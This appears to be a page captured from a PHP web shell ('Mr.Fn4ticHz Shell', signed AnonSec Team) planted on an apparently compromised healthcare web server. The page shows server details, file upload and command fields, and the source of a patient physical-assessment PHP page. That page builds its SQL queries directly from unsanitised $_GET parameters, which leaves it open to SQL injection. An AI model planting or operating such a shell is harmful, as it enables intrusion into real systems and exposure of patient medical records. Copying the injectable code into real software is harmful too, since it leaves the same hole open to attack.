Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 3.140.196.244
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/login.easenup.in/NewNurse/Patient/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/btiyawmy/public_html/login.easenup.in/NewNurse/Patient/show_Physical_Assessment.php
<?php
 
		$sql2 ="SELECT * FROM save_activity WHERE srno='$_GET[srno]'";
		$qsql2 = mysqli_query($con,$sql2);
		if($re1 = mysqli_fetch_array($qsql2))
		{
		    
		
}
?>
	  





<h3 align='center'>Pre-Anesthesia evaluation</h3>


<?php

	$sqlpatient = "SELECT * FROM save_activity WHERE  prescriptionid='$_GET[prescriptionid]' AND discription='Pre-Assessment Sheet<br>Pre Anesthesia evaluation<br>Doc.no-'";
	$qsqlpatient = mysqli_query($con,$sqlpatient);
	if($rsp = mysqli_fetch_array($qsqlpatient))
	{
	    if($rsp[discription]== 'Pre-Assessment Sheet<br>Pre Anesthesia evaluation<br>Doc.no-'){
	       // echo"<h4>Doc.no : $rsp[srno]</h4>";

} else{
    echo "";
}
       
	}
?>  


   <div class=''>
          <?php
  	$sql ="SELECT * FROM Physical_Assessment WHERE prescriptionid='$_GET[prescriptionid]' AND patientid='$_GET[patientid]' AND surgeryid='$_GET[surgeryid]'";
		$qsql = mysqli_query($con,$sql);
		if($rs = mysqli_fetch_array($qsql))
		{
		    echo"
		    <h3 align='right'><a href='Edit_Physical_Assessment.php?prescriptionid=$rs[prescriptionid]&patientid=$rs[patientid]&surgeryid=$rs[surgeryid]'><i class='fa fa-pencil-square-o'></i>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</a></h3>";
		}
		?>
       <table id='example2' class='table table-bordered table-hover'>
<?php 
		$sql ="SELECT * FROM Physical_Assessment WHERE prescriptionid='$_GET[prescriptionid]' AND patientid='$_GET[patientid]' AND surgeryid='$_GET[surgeryid]'";
		$qsql = mysqli_query($con,$sql);
		while($rs = mysqli_fetch_array($qsql))
		{
		    echo "
 <tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp; XYLOCAINE SENSITIVITY: </td>
<td width='50%'>$rs[XYLOCAINE_SENSITIVITY]</td>
</tr>

<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Food Intake  :  </td>
<td width='50%'>$rs[Food_Intake]</td>
</tr>

<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  PHYSICAL STATUS  :  </td>
<td width='50%'>$rs[PHYSICAL_STATUS]</td>
</tr>

<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  MALLAMPATI SCORE :  </td>
<td width='50%'>$rs[Mallampati_Score]</td>
</tr>


<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Thyromental Distance :  </td>
<td width='50%'>$rs[Thyromental_Distance]</td>
</tr>

<tr>
<td width='50%'>&nbsp;  &nbsp; &nbsp; &nbsp;  Metabolic Score :  </td>
<td width='50%'>$rs[Metabolic_Score]</td>
</tr>






";
}
?>

				</table>
</div>


Anon7 - 2022
AnonSec Team